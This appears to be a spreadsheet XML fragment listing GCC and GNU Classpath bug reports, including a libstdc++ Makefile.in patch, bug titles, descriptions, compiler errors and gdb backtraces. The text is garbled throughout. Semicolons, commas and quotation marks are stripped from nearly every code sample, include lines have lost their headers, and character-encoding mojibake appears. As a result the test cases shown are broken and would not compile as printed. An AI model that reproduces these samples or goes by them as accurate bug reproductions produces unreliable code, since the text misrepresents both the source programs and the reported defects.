+++ gcc-4.3-20080410/libstdc++-v3/src/Makefile.in	2008-04-14 23:16:35.000000000 +1000
@@ -2126 +2127 @@
 LIBS = @LIBS@
 LIBSUPCXX_PICFLAGS = @LIBSUPCXX_PICFLAGS@
 LIBTOOL = @LIBTOOL@
+LIBTOOLLINK = @LIBTOOL@-link
 LN_S = @LN_S@
 LTLIBICONV = @LTLIBICONV@
 LTLIBOBJS = @LTLIBOBJS@
@@ -4727 +4737 @@
 # course is problematic at this point.  So we get the top-level
 # directory to configure libstdc++-v3 to use gcc as the C++
 # compilation driver.
-CXXLINK = $(LIBTOOL) --tag CXX --mode=link $(CXX) \
+CXXLINK = $(LIBTOOLLINK) --tag CXX --mode=link $(CXX) \
 	  $(OPT_LDFLAGS) $(SECTION_LDFLAGS) $(AM_CXXFLAGS) $(LTLDFLAGS) -o $@
 debugdir = debug
@@ -5367 +5378 @@
 	  echo rm -f \$${dir}/so_locations\ \
 	  rm -f $${dir}/so_locations \
 	done
-libstdc++.la: $(libstdc___la_OBJECTS) $(libstdc___la_DEPENDENCIES) 
+libstdc++.la: $(libstdc___la_OBJECTS) $(libstdc___la_DEPENDENCIES)
+	sed '/postdeps=/s@\-.*\-lm@\-lm@' `echo $(LIBTOOL) | cut -d\  -f2` &gt; `echo $(LIBTOOLLINK) | cut -d\  -f2` 
 	$(CXXLINK) -rpath $(toolexeclibdir) $(libstdc___la_LDFLAGS) $(libstdc___la_OBJECTS) $(libstdc___la_LIBADD) $(LIBS)
 mostlyclean-compile:
#######END OF PATCH CODE######</t>
  </si>
  <si>
    <t>earthengine</t>
  </si>
  <si>
    <t>GCC-12239</t>
  </si>
  <si>
    <t>When compiling gcc for a i686-pc-cygwin host targeting sparc-sun-solaris2
the file: ctype_noninline.h does not compile.  It references the 
symbol _ctype_.  However for solaris this should read
(const char*)__ctype instead in order to compile and work properly.</t>
  </si>
  <si>
    <t>mattinger</t>
  </si>
  <si>
    <t>GCC-68907</t>
  </si>
  <si>
    <t>bogus warning: right-hand operand of comma expression has no effect on an atomic_int preincrement</t>
  </si>
  <si>
    <t>GCC 5.1.0 and current trunk issue the following incorrect warning on the preincrement of an _Atomic variable.
$ cat ~/tmp/t.c &amp;&amp; /build/gcc-trunk/gcc/xgcc -B /build/gcc-trunk/gcc -S -Wall -Wextra -o/dev/null ~/tmp/t.c
$ cat ~/tmp/t.c &amp;&amp; /build/gcc-trunk/gcc/xgcc -B /build/gcc-trunk/gcc -S -Wall -Wextra -o/dev/null ~/tmp/t.c
typedef _Atomic int AI
extern AI ai
void increment (void)
{
    ++ai
}
/home/remote/msebor/tmp/t.c: In function â€˜incrementâ€™:
/home/remote/msebor/tmp/t.c:7:5: warning: right-hand operand of comma expression has no effect [-Wunused-value]
     ++ai
     ^~~~</t>
  </si>
  <si>
    <t>CLASSPATH-25506</t>
  </si>
  <si>
    <t>JTextFields don't call insertUpdate unless the Caret is at the end</t>
  </si>
  <si>
    <t>The testcase attached shows that JTextField (or rather it's View FieldView) is not calling insertUpdate when text is inserted in the middle of the current text.  This is not right and it's leading to ugly displays.</t>
  </si>
  <si>
    <t>GCC-44801</t>
  </si>
  <si>
    <t>Finding max element in an unsigned int array fails with -O3</t>
  </si>
  <si>
    <t>It seems the optimizer does not cope with the high bit set in unsigned int arrays and does not find the max element in an array. Test case (fails with -O3 and with gcc 4.3 or gcc 4.4).
#include 
#include 
unsigned int g(const unsigned int* p int n) {
    unsigned int max1 = 0
    const unsigned int* q *qend
    for (q = p qend=p+n q!=qend ++q) {
        if (*q&gt;max1) {max1=*q}
    }
    return max1
}
int main() {
        unsigned int arr[8] = {0} max
        arr[0] = 255u*255u*255u*255u
        max =  g(arr 8)
        printf(max: %u\n max)
        assert(max==arr[0])
        return 0
}
heldepn@nehalemex:~&gt; gcc -O3 minmaxbug.c
heldepn@nehalemex:~&gt; ./a.out 
max: 0
a.out: minmaxbug.c:18: main: Assertion `max==arr[0]' failed.
Aborted
heldepn@nehalemex:~&gt; gcc -v
Using built-in specs.
Target: x86_64-suse-linux
Configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++javaada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.4 --enable-ssp --disable-libssp --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --disable-libmudflap --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --enable-version-specific-runtime-libs --program-suffix=-4.4 --enable-linux-futex --without-system-libunwind --with-arch-32=i586 --with-tune=generic --build=x86_64-suse-linux
Thread model: posix
gcc version 4.4.1 [gcc-4_4-branch revision 150839] (SUSE Linux)</t>
  </si>
  <si>
    <t>paavo</t>
  </si>
  <si>
    <t>GCC-77605</t>
  </si>
  <si>
    <t>[5 Regression] wrong code at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>This seems to affect at least all versions 4.6.x and later. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160915 (experimental) [trunk revision 240161] (GCC) 
$ 
$ gcc-trunk -O2 small.c ./a.out
$ 
$ gcc-trunk -O3 small.c
$ ./a.out
Aborted (core dumped)
$ 
----------------------------------------
int a b c[2][8]
int main ()
{
  for (a = 0 a &lt; 8 a++)
    for (b = 0 b &lt; 2 b++)
      c[b][a] = c[b][b + 6] ^ 1
  if (c[0][7] != 0) 
    __builtin_abort ()
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-11014</t>
  </si>
  <si>
    <t>[m68k] MIT / MOTOROLA assembly conflict</t>
  </si>
  <si>
    <t>GCC when configured for MIT assembly syntax emits unconditionally assembler
statements using MOTOROLA syntax in m68k.c/m68k_output_mi_thunk(). Other
similiar places use #ifdef MOTOROLA ... #else ... #endif to handle this
difference.
Environment:
host: i386-unknown-freebsd4.8
build: i386-unknown-freebsd4.8
target: m68k-unknown-amigaos
configured with: ../gcc-3.3-gg/configure --enable-languages=cc++ --target=m68k-amigaos
How-To-Repeat:
configure an MIT target and compile libstdc++</t>
  </si>
  <si>
    <t>gni</t>
  </si>
  <si>
    <t>GCC-7821</t>
  </si>
  <si>
    <t>make bootstrap fails with fatal error in all-target-libjava</t>
  </si>
  <si>
    <t>aris2.7/bin/ -B/cirrus/smtools/gnu64/sparc-sun-solaris2.7/lib/ -isystem /cirrus/smtools/gnu64/sparc-sun-solaris2.7/include  -m64  LD=/usr/ccs/bin/ld  LIBCFLAGS=-g -O2  -m64  NM=/cirrus/smtools/gnu64/sparc-sun-solaris2.7/bin/nm  PICFLAG=  RANLIB=true  DESTDIR= DO=all multi-do
mksh: Fatal error in reader: = missing from replacement macro reference
Current working directory /home/kk/utilities/objdir/sparc-sun-solaris2.7/libjava
*** Error code 1
make: Fatal error: Command failed for target `all-target-libjava'
Current working directory /home/kk/utilities/objdir
*** Error code 1
make: Fatal error: Command failed for target `bootstrap'
Release:
GCC 3-2
Environment:
Solaris 7 using gcc 3-1
How-To-Repeat:
../gcc-3.2/configure --prefix=/cirrus/smtools/gnu64 --with-as=/usr/ccs/bin/as --with-ld=/usr/ccs/bin/ld --disable-nls
make bootstrap</t>
  </si>
  <si>
    <t>GCC-18596</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in make_decl_rtl</t>
  </si>
  <si>
    <t>With the testcase in 12322 we get an ICE after errors because of nested functions.
Reduced testcase:
int f(int i)
{
  static int g()
  static int g() { return i }
  return g()
}
: Search converges between 2004-07-27-trunk (#496) and 2004-07-28-trunk (#497).</t>
  </si>
  <si>
    <t>GCC-3591</t>
  </si>
  <si>
    <t>[mcore-elf] GCC 3.0-CVS configuration problem</t>
  </si>
  <si>
    <t>Fails with following messages
checking for thread model used by GCC... single
checking for exception model to use... configure: error: unable to detect exception model
make: *** [configure-target-libstdc++-v3]
Release:
gcc 3.0-CVS
Environment:
GNU/Linux x86 (RedHat 6.2) with binutils 2.11.2 for target
How-To-Repeat:
Configure and build as follows:
../gcc/configure --target=${1} \
     --with-gnu-as --with-gnu-ld --with-newlib --verbose \
    --prefix=/opt/gnucross '--enable-languages=cc++' &amp;&amp; make 
Contact me for assistance with binutils.</t>
  </si>
  <si>
    <t>GCC-34355</t>
  </si>
  <si>
    <t>ICE: invariant not recomputed when ADDR_EXPR changed with -ftree-parallelize-loops</t>
  </si>
  <si>
    <t>This testcase fails with g++
--cut here--
typedef double EXPRESS[5]
extern int Terms
void Parse_Rel_Factor (EXPRESS Express int *Terms)
{
  EXPRESS Local_Express = {5.0 4.0 3.0 2.0 1.0}
  int Local_Terms = 5
  int i
  for (i = (*Terms) i &lt; Local_Terms i++)
    Express[i] = 0.0
  Express[i] += Local_Express[i]
}
double Parse_Float ()
{
  EXPRESS Express = {1.0 2.0 3.0 4.0 5.0}
  Parse_Rel_Factor (Express 
}
--cut here--
g++ -O3 -msse2 -ftree-parallelize-loops=4 tt.cpp
tt.cpp: In function Ã¢double Parse_Float()Ã¢:
tt.cpp:18: error: invariant not recomputed when ADDR_EXPR changed
tt.cpp:18: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Please note that the same testcase renamed to __.c compiles OK with 'gcc -O3 -msse2 -ftree-parallelize-loops=4 -S tt.c'. [I guess that due to this 'c++' component should be selected.]
Also note that if 'Express[i] += Local_Express[i]' line is removed g++ segfaults trying to output diagnostics in:
Program received signal SIGSEGV Segmentation fault.
0x081165d8 in cp_diagnostic_starter (context=0x8a5e040 diagnostic=0xbf8874b0) at ../../gcc-svn/trunk/gcc/cp/error.c:2466
/home/uros/gcc-svn/trunk/gcc/cp/error.c:2466:64935:beg:0x81165d8
(gdb) bt
#0  0x081165d8 in cp_diagnostic_starter (context=0x8a5e040 diagnostic=0xbf8874b0) at ../../gcc-svn/trunk/gcc/cp/error.c:2466
#1  0x082b9249 in diagnostic_report_diagnostic (context=0x8a5e040 diagnostic=0xbf8874b0) at ../../gcc-svn/trunk/gcc/diagnostic.c:421
#2  0x082b952a in error (gmsgid=0x893c52c invariant not recomputed when ADDR_EXPR changed) at ../../gcc-svn/trunk/gcc/diagnostic.c:558
#3  0x084b3a51 in verify_expr (tp=0xb7c1c724 walk_subtrees=0xbf887568 data=0x0) at ../../gcc-svn/trunk/gcc/tree-cfg.c:3191
#4  0x0867544b in walk_tree_1 (tp=0xb7c1c724 func=0x84b2d50  data=0x0 pset=0x0 lh=0) at ../../gcc-svn/trunk/gcc/tree.c:8376
#5  0x0867557a in walk_tree_1 (tp=0xb7ccfdfc func=0x84b2d50  data=0x0 pset=0x0 lh=0) at ../../gcc-svn/trunk/gcc/tree.c:8615
#6  0x0849ff1c in verify_stmts () at ../../gcc-svn/trunk/gcc/tree-cfg.c:4140
#7  0x085fb00f in verify_ssa (check_modified_stmt=1 '\001') at ../../gcc-svn/trunk/gcc/tree-ssa.c:613
#8  0x08411b25 in execute_function_todo (data=0x80000) at ../../gcc-svn/trunk/gcc/passes.c:963
#9  0x08411779 in do_per_function (callback=0x8411900  data=0x80000) at ../../gcc-svn/trunk/gcc/passes.c:805
#10 0x08411851 in execute_todo (flags=524288) at ../../gcc-svn/trunk/gcc/passes.c:989
#11 0x08411cda in execute_one_pass (pass=0x8a4f860) at ../../gcc-svn/trunk/gcc/passes.c:1081</t>
  </si>
  <si>
    <t>GCC-18217</t>
  </si>
  <si>
    <t>[4.0 Regression] Ada Bootstrap failures on powerpc-darwin with undefined symbol (__Unwind_fallback_frame_state_for)</t>
  </si>
  <si>
    <t>../../xgcc -B../../ -c -DIN_GCC   `echo -O2 -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes 
-Wmissing-prototypes -fno-common |sed -e 's/-pedantic//g' -e 's/-Wtraditional//g'`   -O2 -g -O2   
-I. -I.. -I../.. -I/Users/pinskia/src/local2/gcc/gcc/ada -I/Users/pinskia/src/local2/gcc/gcc/ada/../
config -I/Users/pinskia/src/local2/gcc/gcc/ada/../../include -I/Users/pinskia/src/local2/gcc/gcc/ada/
.. /Users/pinskia/src/local2/gcc/gcc/ada/link.c \
  -o link.o
../../xgcc -B../../ -DIN_GCC   `echo -O2 -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes 
-Wmissing-prototypes -fno-common |sed -e 's/-pedantic//g' -e 's/-Wtraditional//g'`   -o ../../
gnatmake b_gnatm.o a-except.o ctrl_c.o ali.o ali-util.o s-casuti.o alloc.o atree.o binderr.o butil.o 
casing.o csets.o debug.o elists.o einfo.o erroutc.o errutil.o err_vars.o fmap.o fname.o fname-uf.o 
fname-sf.o gnatmake.o gnatvsn.o hostparm.o interfac.o i-c.o i-cstrin.o krunch.o lib.o make.o 
makeusg.o makeutl.o mlib.o mlib-fil.o mlib-prj.o mlib-tgt.o mlib-utl.o namet.o nlists.o opt.o osint.o 
osint-m.o output.o prj.o prj-attr.o prj-attr-pm.o prj-com.o prj-dect.o prj-env.o prj-err.o prj-ext.o 
prj-nmsc.o prj-pars.o prj-part.o prj-proc.o prj-strt.o prj-tree.o prj-util.o rident.o s-exctab.o s-
secsta.o s-stalib.o s-stoele.o scans.o scng.o sdefault.o sfn_scan.o s-purexc.o s-htable.o sinfo.o 
sinput.o sinput-c.o sinput-p.o snames.o stand.o stringt.o styleg.o stylesw.o system.o validsw.o 
switch.o switch-m.o table.o targparm.o tempdir.o tree_io.o types.o uintp.o  uname.o urealp.o usage.o 
widechar.o  \
      ../rts/libgnat.a  ../../prefix.o ../../version.o link.o ../../../libiberty/libiberty.a  
/usr/bin/ld: Undefined symbols:
__Unwind_fallback_frame_state_for
collect2: ld returned 1 exit status
make[4]: *** [../../gnatmake] Error 1
make[3]: *** [gnattools1] Error 2
make[2]: *** [gnattools-native] Error 2
make[1]: *** [all-target-libada] Error 2
make: *** [bootstrap] Error 2
gcc_build: error: Could not bootstrap the compiler</t>
  </si>
  <si>
    <t>GCC-38310</t>
  </si>
  <si>
    <t>-ftree-parallelize-loops=4 causes ICE with gcc-4.3.2</t>
  </si>
  <si>
    <t>I tried to compile mplayerxp with -ftree-parallelize-loops=4 and gcc produced ICE:
gcc -m64 -c -march=amdfam10 -O3 -funroll-all-loops -ffast-math -fprefetch-loop-arrays -ftree-parallelize-loops=4 -mmmx -m3dnow -msse -msse2 -msse3 -msse4a -mabm -mcx16 -msahf  --param l1-cache-line-size=64 --param l1-cache-size=128 --param l2-cache-size=512 -mfpmath=387sse -mfancy-math-387 -mveclibabi=acml -finline-functions-called-once -funit-at-a-time -pipe -fopenmp -fopenmp -ftree-parallelize-loops=4 -I/usr/X11/include -I/usr/X11R6/include  -W -Wall -D_REENTRANT -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -D__USE_FILE_OFFSET64 -D__USE_LARGEFILE -D_LARGEFILE64_SOURCE -I. -I.. -I../../codecs/libavutil -Wall -o af_format.o af_format.c
af_format.c: In function 'play._loopfn.6':
af_format.c:382: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-45038</t>
  </si>
  <si>
    <t>__DBL_MIN__ result in old-style-cast</t>
  </si>
  <si>
    <t>My code use DBL_MIN with warning option -Wold-style-cast -Werror. 
But I found DBL_MIN definition has changed in gcc4.5.0
When use ./cpp -dM /dev/null I got :
#define __DBL_MIN__ ((double)2.22507385850720138309e-308L)
Why gcc use old style cast in macro?</t>
  </si>
  <si>
    <t>buaa_figo</t>
  </si>
  <si>
    <t>GCC-62076</t>
  </si>
  <si>
    <t>[4.9/5 Regression] testsuite failure in udr2.90</t>
  </si>
  <si>
    <t>This is with current trunk rev. 213777 .
With
MALLOC_CHECK_=3
MALLOC_PERTURB_=69
udf2.f90 in the gomp testsuite segfaults on x86_64-unknown-linux-gnu :
g25@linux-fd1f:~/Krempel/Udr&gt; gfortran -fopenmp udr2.f90 
f951: internal compiler error: Bus error
0xa4b5df crash_signal
        ../../trunk/gcc/toplev.c:337
0x5e7ea7 restore_old_symbol
        ../../trunk/gcc/fortran/symbol.c:2977
0x5ec16f gfc_restore_last_undo_checkpoint()
        ../../trunk/gcc/fortran/symbol.c:3165
0x5b436a reject_statement
        ../../trunk/gcc/fortran/parse.c:2049
0x5b45c5 match_word_omp_simd
        ../../trunk/gcc/fortran/parse.c:98
0x5b4e66 decode_omp_directive
        ../../trunk/gcc/fortran/parse.c:632
0x5b7826 next_free
        ../../trunk/gcc/fortran/parse.c:911
0x5b7826 next_statement
        ../../trunk/gcc/fortran/parse.c:1121
0x5b84b4 parse_spec
        ../../trunk/gcc/fortran/parse.c:2890
0x5b9f58 parse_progunit
        ../../trunk/gcc/fortran/parse.c:4565
0x5bb663 gfc_parse_file()
        ../../trunk/gcc/fortran/parse.c:5040
0x5f9d75 gfc_be_parse_file
        ../../trunk/gcc/fortran/f95-lang.c:212
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Debugging shows
(gdb) r -fopenmp udr2.f90 
Starting program: /home/ig25/lib/gcc/x86_64-unknown-linux-gnu/4.10.0/f951 -fopenmp udr2.f90
Missing separate debuginfo for /lib64/ld-linux-x86-64.so.2
Try: zypper install -C debuginfo(build-id)=afa98667969782208459e394f8c8f87ac7510710
Missing separate debuginfo for /usr/lib64/libmpc.so.3
Try: zypper install -C debuginfo(build-id)=288e8a4612c94a145a5d5610c0b623a4b076a039
Missing separate debuginfo for /usr/lib64/libmpfr.so.4
Try: zypper install -C debuginfo(build-id)=e54c96a8c6fe8d61d9f651e84ab6bb797bd0c056
Missing separate debuginfo for /usr/lib64/libgmp.so.10
Try: zypper install -C debuginfo(build-id)=de7576ca61091d140da409e2682b78cc6101b373
Missing separate debuginfo for /lib64/libdl.so.2
Try: zypper install -C debuginfo(build-id)=666913ec064c25fde1720db77b1f57bdeb5d9b3a
Missing separate debuginfo for /lib64/libm.so.6
Try: zypper install -C debuginfo(build-id)=35d35d9ce781be3a140a34242d998498615b021f
Missing separate debuginfo for /lib64/libc.so.6
Try: zypper install -C debuginfo(build-id)=881176f957e2887122be7fac9c3b69cd64ad707d
Program received signal SIGBUS Bus error.
restore_old_symbol (p=0x191d250) at ../../trunk/gcc/fortran/symbol.c:2977
2977      p-&gt;ts.type = old-&gt;ts.type
(gdb) p old   
$1 = (gfc_symbol *) 0x4545454545454545</t>
  </si>
  <si>
    <t>GCC-59777</t>
  </si>
  <si>
    <t>Incorrect expansion of TLS arguments in a call</t>
  </si>
  <si>
    <t>Created attachment 31813
Testcase.
The attached testcase shows the problem.  Argument expressions containing
a TLS symbol reference need to be precomputed as a call may be needed to
legitimize the address and this may clobber the setup for earlier arguments
causing wrong code.
For example compilation of the testcase with:
gcc-4.8 -fPIC -DPIC -W -Wall -Wextra -Wshadow -Wformat -Wundef -D_GNU_SOURCE -O0 cap-ng.c -fPIC -DPIC -o cap-ng
results in the following output:
$ ./cap-ng
cc
m.hdr1 = 0x400015c8
pidaaaa = 0
There seems to be some attempt to handle this in precompute_register_parameters().</t>
  </si>
  <si>
    <t>GCC-28827</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE with nested template friend</t>
  </si>
  <si>
    <t>template
struct Base : T
{
  typedef T Derived
}
struct A
{
  template
  friend struct Base::Derived::Crash
// nested.cpp:10: internal compiler error: in lookup_member at cp/search.c:1213
// ICE with g++-4.0.3
// PASS with g++-3.4.6
}</t>
  </si>
  <si>
    <t>proppy</t>
  </si>
  <si>
    <t>GCC-53200</t>
  </si>
  <si>
    <t>[4.8 Regression] bootstrap broken on x86_64-apple-darwin10 at revision 187018</t>
  </si>
  <si>
    <t>Bootstrap is broken on x86_64-apple-darwin10 at revision 187018:
...
libtool: compile:  /opt/gcc/build_a/./gcc/xgcc -B/opt/gcc/build_a/./gcc/ -B/opt/gcc/gcc4.8a/x86_64-apple-darwin10.8.0/bin/ -B/opt/gcc/gcc4.8a/x86_64-apple-darwin10.8.0/lib/ -isystem /opt/gcc/gcc4.8a/x86_64-apple-darwin10.8.0/include -isystem /opt/gcc/gcc4.8a/x86_64-apple-darwin10.8.0/sys-include -DHAVE_CONFIG_H -I../../../../_clean/libatomic/config/x86 -I../../../../_clean/libatomic/config/posix -I../../../../_clean/libatomic -I. -march=i486 -mtune=generic -fomit-frame-pointer -Wall -Werror -pthread -g -O2 -m32 -MT gload.lo -MD -MP -MF .deps/gload.Tpo -c ../../../../_clean/libatomic/gload.c  -fno-common -DPIC -o .libs/gload.o
../../../../_clean/libatomic/gload.c: In function 'libat_load':
../../../../_clean/libatomic/gload.c:33:30: error: expected expression before ')' token
   if (C2(HAVE_ATOMIC_LDST_N))     \
                              ^
../../../../_clean/libatomic/gload.c:33:30: note: in expansion of macro 'EXACT_INLINE'
../../../../_clean/libatomic/gload.c:45:5: note: expanded from here
../../../../_clean/libatomic/gload.c:45:5: note: in expansion of macro 'EXACT_'
../../../../_clean/libatomic/gload.c:54:5: note: expanded from here
../../../../_clean/libatomic/gload.c:54:5: note: in expansion of macro 'EXACT'
../../../../_clean/libatomic/gload.c:80:15: note: expanded from here
../../../../_clean/libatomic/gload.c:33:30: error: expected expression before ')' token
   if (C2(HAVE_ATOMIC_LDST_N))     \
                              ^
../../../../_clean/libatomic/gload.c:33:30: note: in expansion of macro 'EXACT_INLINE'
../../../../_clean/libatomic/gload.c:45:5: note: expanded from here
../../../../_clean/libatomic/gload.c:45:5: note: in expansion of macro 'EXACT_'
../../../../_clean/libatomic/gload.c:63:7: note: expanded from here
../../../../_clean/libatomic/gload.c:63:7: note: in expansion of macro 'LARGER'
../../../../_clean/libatomic/gload.c:84:25: note: expanded from here</t>
  </si>
  <si>
    <t>GCC-42685</t>
  </si>
  <si>
    <t>[4.5 Regression] -fcompare-debug failure with -O1 -funroll-loops (2)</t>
  </si>
  <si>
    <t>Command line:
g++ -O1 -fcompare-debug -funroll-loops -c testcase.cpp
-fno-web helps even in the nonreduced testcase
Tested revisions:
r155777 - crash
r155680 - crash
r154830 - crash
r153685 - crash
Output:
$ /mnt/svn/gcc-trunk/binary-155777-lto/bin/g++ -O1 -fcompare-debug -funroll-loops -c testcase.cpp
g++: testcase.cpp: -fcompare-debug failure
Valgrind:
no errors reported</t>
  </si>
  <si>
    <t>GCC-54177</t>
  </si>
  <si>
    <t>[4.8 Regression]: Segfault in cselib_lookup due to NULL_RTX passed from vt_add_function_parameter</t>
  </si>
  <si>
    <t>Current gcc [1] fails following testcase on alpha-linux-gnu:
FAIL: gcc.c-torture/compile/compound-literal-3.c  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/compile/compound-literal-3.c  -O3 -g  (test for excess errors)
This bug can be triggered by a crosscompiler to alpha-linux-gnu:
(gdb) r
Starting program: /home/uros/gcc-build-alpha/gcc/cc1 -O3 -g -quiet compound-literal-3.c
Program received signal SIGSEGV Segmentation fault.
cselib_lookup (x=0x0 mode=SCmode create=create@entry=1 memmode=memmode@entry=VOIDmode) at ../../gcc-svn/trunk/gcc/cselib.c:2092
2092      cselib_val *ret = cselib_lookup_1 (x mode create memmode)
(gdb) bt
#0  cselib_lookup (x=0x0 mode=SCmode create=create@entry=1 memmode=memmode@entry=VOIDmode) at ../../gcc-svn/trunk/gcc/cselib.c:2092
#1  0x00000000005b4cda in cselib_lookup_from_insn (x= mode= create=create@entry=1 memmode=memmode@entry=VOIDmode insn=insn@entry=0x7ffff1aab1c0)
    at ../../gcc-svn/trunk/gcc/cselib.c:2078
#2  0x0000000000a2afd6 in vt_add_function_parameter (parm=parm@entry=0x7ffff1aa7080) at ../../gcc-svn/trunk/gcc/var-tracking.c:9437
#3  0x0000000000a2b630 in vt_add_function_parameters () at ../../gcc-svn/trunk/gcc/var-tracking.c:9509
#4  vt_initialize () at ../../gcc-svn/trunk/gcc/var-tracking.c:9765
#5  0x0000000000a34df7 in variable_tracking_main_1 () at ../../gcc-svn/trunk/gcc/var-tracking.c:10009
(gdb) f 2
#2  0x0000000000a2afd6 in vt_add_function_parameter (parm=parm@entry=0x7ffff1aa7080) at ../../gcc-svn/trunk/gcc/var-tracking.c:9437
9437          val = cselib_lookup_from_insn (var_lowpart (mode incoming) mode true
(gdb) p debug_rtx (incoming)
(concat:SC (reg:SF 48 $f16 [ x ])
    (reg:SF 49 $f17 [ x+4 ]))
$1 = void
(gdb) p mode
$2 = SCmode
var_lowpart can hadle only REG_P and MEM_P operands. However we are already in SCmode so there is no need to call it at all.
[1]
Compiler version: 4.8.0 20120804 (experimental) [trunk revision 190144] (GCC) 
Platform: alphaev68-unknown-linux-gnu</t>
  </si>
  <si>
    <t>GCC-24325</t>
  </si>
  <si>
    <t>[4.1 only] ICE in gfc_get_function_type</t>
  </si>
  <si>
    <t>integer foo
  call test
contains
  subroutine test
    integer :: i
    i = foo ()
  end subroutine test
end</t>
  </si>
  <si>
    <t>GCC-32413</t>
  </si>
  <si>
    <t>[4.3 Regression] internal compiler error: in reload_cse_simplify_operands at postreload.c:396</t>
  </si>
  <si>
    <t>svn revision:125876
cc -c -mno-cygwin -mdll -fno-rtti -mthreads -pipe -D_WINGDI_ -DUCLIBCPP -D_GLIBC
PP_HAVE_MBSTATE_T -D_WIN32_IE=0x0500 -msse4a -DARCH_IS_IA32 -DARCH_IS_32BIT -DHA
VE_MMX -w -DNDEBUG -UDEBUG -DFFDEBUG=0 -I. -I.. -Iuclibc++ -Ibaseclasses -I../ba
seclasses -IimgFilters -I../imgFilters -Implayer -I../mplayer -Isettings -I../se
ttings -Isettings/filters -I../settings/filters -Icodecs -I../codecs -Isubtitles
 -I../subtitles -Iconvert -I../convert -Idialog -I../dialog -IaudioFilters -I../
audioFilters -Icygwin -I../cygwin -Iffmpeg -I../ffmpeg -Iacm -I../acm -Ixiph -I.
./xiph -Ifilters -I../filters -Imuxers -I../muxers -O4 -march=core2 -mtune=core2
 -fomit-frame-pointer -finline-functions -finline -frename-registers -fweb -funi
t-at-a-time -o ffdshow_all.o ffdshow_all.cpp
In file included from ffdshow_all.cpp:37:
DeCSSInputPin.cpp: In member function 'virtual long int CDeCSSInputPin::Set(cons
t GUID&amp; ULONG void* ULONG void* ULONG)':
DeCSSInputPin.cpp:254: error: insn does not satisfy its constraints:
(insn 1194 592 593 19 CSSscramble.cpp:174 (set (reg:QI 22 xmm1 [orig:545 t5.7036
1 ] [545])
        (reg:QI 0 ax)) 43 {*movqi_1} (nil))
DeCSSInputPin.cpp:254: internal compiler error: in reload_cse_simplify_operands
 at postreload.c:396
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [ffdshow_all.o] Error 1
cc: warning: -pipe ignored because -save-temps specified
In file included from ffdshow_all.cpp:38:
DeCSSInputPin.cpp: In member function 'virtual long int CDeCSSInputPin::Set(cons
t GUID&amp; ULONG void* ULONG void* ULONG)':
DeCSSInputPin.cpp:254: error: insn does not satisfy its constraints:
(insn 1194 592 593 19 CSSscramble.cpp:174 (set (reg:QI 22 xmm1 [orig:545 t5.7036
1 ] [545])
        (reg:QI 0 ax)) 43 {*movqi_1} (nil))
DeCSSInputPin.cpp:254: internal compiler error: in reload_cse_simplify_operands
 at postreload.c:396
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6348</t>
  </si>
  <si>
    <t>internal error in allocate_dynamic_stack_space with STACK_SIZE_MODE non-default</t>
  </si>
  <si>
    <t>There is an internal error in allocate_dynamic_stack_space()
in explow.c.  It appears when an allocate_stack pattern is provided in the machine description so that
HAVE_allocate_stack gets #defined and when STACK_SIZE_MODE
is different from Pmode.  Reason is that the size argument of
allocate_dynamic_stack_space() is converted to Pmode at the
beginning so that the copy_to_mode_reg of size to a register
of mode STACK_SIZE_MODE fails.  A bug fix converting size to
STACK_SIZE_MODE and using copy_to_reg then is included.
Release:
gcc-3.0.4
Environment:
all ports providing an allocate_stack pattern with STACK_SIZE_MODE
How-To-Repeat:
Any port providing allocate_stack in the machine description
and using STACK_SIZE_MODE of a size different from Pmode.</t>
  </si>
  <si>
    <t>servatius.brandt</t>
  </si>
  <si>
    <t>GCC-65024</t>
  </si>
  <si>
    <t>[OOP] unlimited polymorphic pointer structure not built when it should be</t>
  </si>
  <si>
    <t>Created attachment 34732
Sample program that produces the referenced internal compiler error.
As explained in the GNU Fortran mailing list (see http://gcc.gnu.org/ml/fortran/2015-02/msg00047.html ).
Please find attached some annotated sample code ('test.f90') that produces the error in question. The compiler seems to have trouble with the subroutine that I've named 'BUG' (lines 37-50) more specifically the compiler appears to be complaining about line 48 (which I have labelled line C). The 'BUG' subroutine calls the subroutine named 'NEXT' to associate the 'e' pointer with a piece of preallocated memory and then points the unlimited polymorphic 'e%info' variable to the piece of memory associated with the pointer 'p'. Attempting to compile the code as-is produces the following output:
### Beginning of Terminal output ###
matt$ gfortran -v -save-temps -o test test.f90 
Driving: gfortran -mmacosx-version-min=10.10.1 -v -save-temps -o test test.f90 -l gfortran -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin14.0.0/4.9.2/lto-wrapper
Target: x86_64-apple-darwin14.0.0
Configured with: ../gcc-4.9-20141029/configure --enable-languages=c++fortran
Thread model: posix
gcc version 4.9.2 20141029 (prerelease) (GCC) 
